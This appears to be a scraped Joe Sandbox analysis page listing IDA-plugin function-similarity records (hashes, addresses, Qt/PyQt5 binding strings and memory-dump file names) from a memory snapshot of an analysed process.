Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QRasterWindow$focusOutEvent$focusOutEvent(self, a0: Optional[QFocusEvent])
API String ID: 2314446140-926177790
Opcode ID: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
Instruction ID: ccf9e74e05f2a35a3ac6ca40ac85d077f10b30bdb60ad760f0918e984a4614a8
Opcode Fuzzy Hash: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
Instruction Fuzzy Hash: 23210AB2A0CB46C2EB608F25E8842AA77A8FB95B84F544176DA8D53778DF3CD449C700

Function 00007FFB9A2D9B10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A2D9BAB

Strings

BJ8, xrefs: 00007FFB9A2D9B60
timerEvent(self, a0: Optional[QTimerEvent]), xrefs: 00007FFB9A2D9BD7
QTextBlockGroup, xrefs: 00007FFB9A2D9BEA
timerEvent, xrefs: 00007FFB9A2D9BE3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QTextBlockGroup$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
API String ID: 59943102-2114369179
Opcode ID: b20ccd383174b49dd8a7aad11e58d737cb57195bc6a98d48fb780a3b215fe609
Instruction ID: 35c3fc1dfcb5983e9e5827388681633f3bff9b86b10f415176deebc04ba7a834
Opcode Fuzzy Hash: b20ccd383174b49dd8a7aad11e58d737cb57195bc6a98d48fb780a3b215fe609
Instruction Fuzzy Hash: E6217FB260DB46C1EB60DB25E88426A73A9FB95B84F144172EE8D03B74DF3CD049D740

Function 00007FFB9A355B80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?write@QStandardItem@@UEBAXAEAVQDataStream@@@Z.QT5GUI ref: 00007FFB9A355C1B

Strings

BJ9, xrefs: 00007FFB9A355BD0
write, xrefs: 00007FFB9A355C53
QStandardItem, xrefs: 00007FFB9A355C5A
write(self, out: QDataStream), xrefs: 00007FFB9A355C47

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?write@DataItem@@StandardStream@@@
String ID: BJ9$QStandardItem$write$write(self, out: QDataStream)
API String ID: 350837266-2201310741
Opcode ID: 7d8a3a8dea42c75591ec769acb343bf59136f69a3a13d74e5c35af0942bba584
Instruction ID: 75fb76262005cff4ed04807b1ab374c4e2dcb2321a4c272f51319ac0a4828321
Opcode Fuzzy Hash: 7d8a3a8dea42c75591ec769acb343bf59136f69a3a13d74e5c35af0942bba584
Instruction Fuzzy Hash: 5C2121B1A0DB46C2EB608B25E48426A77A8FB95B85F5451B6DE8D03B74DF3CE145CB00

Function 00007FFB9A34DB50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFB9A34DBEB

Strings

mousePressEvent(self, a0: Optional[QMouseEvent]), xrefs: 00007FFB9A34DC1A
mousePressEvent, xrefs: 00007FFB9A34DC26
BJ8, xrefs: 00007FFB9A34DBA0
QRasterWindow, xrefs: 00007FFB9A34DC2D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QRasterWindow$mousePressEvent$mousePressEvent(self, a0: Optional[QMouseEvent])
API String ID: 2314446140-1465782104
Opcode ID: 78a8af3b6581670a848366d0b1bf6ca02bb7321a044743da2a39fdaeb2ce22f3
Instruction ID: b2e595e2e0b41085e9369637038c1ef8ad0d35c7cd2ef9fc50ebb1cabe948c31
Opcode Fuzzy Hash: 78a8af3b6581670a848366d0b1bf6ca02bb7321a044743da2a39fdaeb2ce22f3
Instruction Fuzzy Hash: B3210AB2A0CB46C2FB608B35E8842AA77A8FB95B84F144176DA8D53774DF3CD449CB40

Function 00007FFB9A30BC30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A30BCCB

Strings

timerEvent(self, a0: Optional[QTimerEvent]), xrefs: 00007FFB9A30BCF7
BJ8, xrefs: 00007FFB9A30BC80
QTextTable, xrefs: 00007FFB9A30BD0A
timerEvent, xrefs: 00007FFB9A30BD03

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QTextTable$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
API String ID: 59943102-828170972
Opcode ID: ba5eceb7b7befedd7aa4a95f9d539db04c16ff839530d3734d5024bab8614963
Instruction ID: 8ba22dc4d09b1ecd4c531e71ddca67bf23bb3126723d80a16657391ba6e1b525
Opcode Fuzzy Hash: ba5eceb7b7befedd7aa4a95f9d539db04c16ff839530d3734d5024bab8614963
Instruction Fuzzy Hash: 81212AB660DB46C2EB608F25E88426A77A8FB96B84F144176DE8D53B74DF3CE045C700

Function 00007FFB9A3138F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFB9A31398B

Strings

keyPressEvent(self, a0: Optional[QKeyEvent]), xrefs: 00007FFB9A3139BA
QWindow, xrefs: 00007FFB9A3139CD
BJ8, xrefs: 00007FFB9A313940
keyPressEvent, xrefs: 00007FFB9A3139C6

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QWindow$keyPressEvent$keyPressEvent(self, a0: Optional[QKeyEvent])
API String ID: 2314446140-498570954
Opcode ID: 9ae3621cef3e836d55117811073ddce6f931f7c42da601680a3dd1bca0ec63fa
Instruction ID: a3119605a9c0081c74e76dd1dfe18a246f3a3e0eb79b166896fd178fca1a5c14
Opcode Fuzzy Hash: 9ae3621cef3e836d55117811073ddce6f931f7c42da601680a3dd1bca0ec63fa
Instruction Fuzzy Hash: 0A216DB260CB46C1EBA08B25E88426A77A8FB95B84F144176DA8D13774EF3CD049CB00

Function 00007FFB9A361900 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A36199B

Strings

QDoubleValidator, xrefs: 00007FFB9A3619DA
BJ9, xrefs: 00007FFB9A361950
disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFB9A3619C7
disconnectNotify, xrefs: 00007FFB9A3619D3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QDoubleValidator$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-3714565819
Opcode ID: caa14c5bbfa9b45f50d0d22f26dd4638bdaa89a7d3cf5f396682005a8785db1b
Instruction ID: 9ed9e165c7ea9a4dda80fe792308fd8ce534f98a5b1952db4ebe854e9978fa1f
Opcode Fuzzy Hash: caa14c5bbfa9b45f50d0d22f26dd4638bdaa89a7d3cf5f396682005a8785db1b
Instruction Fuzzy Hash: B2211BB2A0DB46C2EB608B25E88426A77E8FB95B84F544176DA8D43774DF3CE149C740

Function 00007FFB9A34F900 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFB9A34F99B

Strings

touchEvent, xrefs: 00007FFB9A34F9D6
touchEvent(self, a0: Optional[QTouchEvent]), xrefs: 00007FFB9A34F9CA
BJ8, xrefs: 00007FFB9A34F950
QRasterWindow, xrefs: 00007FFB9A34F9DD

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QRasterWindow$touchEvent$touchEvent(self, a0: Optional[QTouchEvent])
API String ID: 2314446140-1039132365
Opcode ID: 25690c8010e0cb5b129518b43edcdb961cadb02f0dab764a506515360ce7ee40
Instruction ID: fcfd977ae9f3d9f906d53371e0f4ff9803f3261056a50075537f6e62f958f45e
Opcode Fuzzy Hash: 25690c8010e0cb5b129518b43edcdb961cadb02f0dab764a506515360ce7ee40
Instruction Fuzzy Hash: 98212FB2A0CB46D2EB608B35E88426A77A8FB95B84F544176DE8D53B74DF3CE045C700

Function 00007FFB9A3578A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A35793B

Strings

timerEvent(self, a0: Optional[QTimerEvent]), xrefs: 00007FFB9A357967
BJ8, xrefs: 00007FFB9A3578F0
QRegExpValidator, xrefs: 00007FFB9A35797A
timerEvent, xrefs: 00007FFB9A357973

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QRegExpValidator$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
API String ID: 59943102-1879435982
Opcode ID: 4a20e25831b94bad09f215b82177781bf4d2f9800ddbdc99108dcf6a951cd103
Instruction ID: a8ed3783a9f1c311c392fb94768974beeda831528577a6536610b1189fc043d6
Opcode Fuzzy Hash: 4a20e25831b94bad09f215b82177781bf4d2f9800ddbdc99108dcf6a951cd103
Instruction Fuzzy Hash: F0217FB2A0DB46C6EB608B39E88426A77A8FB85B84F145176DE8D53774DF3CD049C700

Function 00007FFB9A355920 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?read@QStandardItem@@UEAAXAEAVQDataStream@@@Z.QT5GUI ref: 00007FFB9A3559BB

Strings

BJ9, xrefs: 00007FFB9A355970
read, xrefs: 00007FFB9A3559F3
QStandardItem, xrefs: 00007FFB9A3559FA
read(self, in_: QDataStream), xrefs: 00007FFB9A3559E7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?read@DataItem@@StandardStream@@@
String ID: BJ9$QStandardItem$read$read(self, in_: QDataStream)
API String ID: 1850864242-2601312664
Opcode ID: eaa0532b5bdcff153250518c35738f2fe41fc71fd1de8b8066c00dcf76caa06b
Instruction ID: 8cbdf5321461646a9ec6aa62749350fdbf5bdd7f15f67cff0d0253fd9b11f42f
Opcode Fuzzy Hash: eaa0532b5bdcff153250518c35738f2fe41fc71fd1de8b8066c00dcf76caa06b
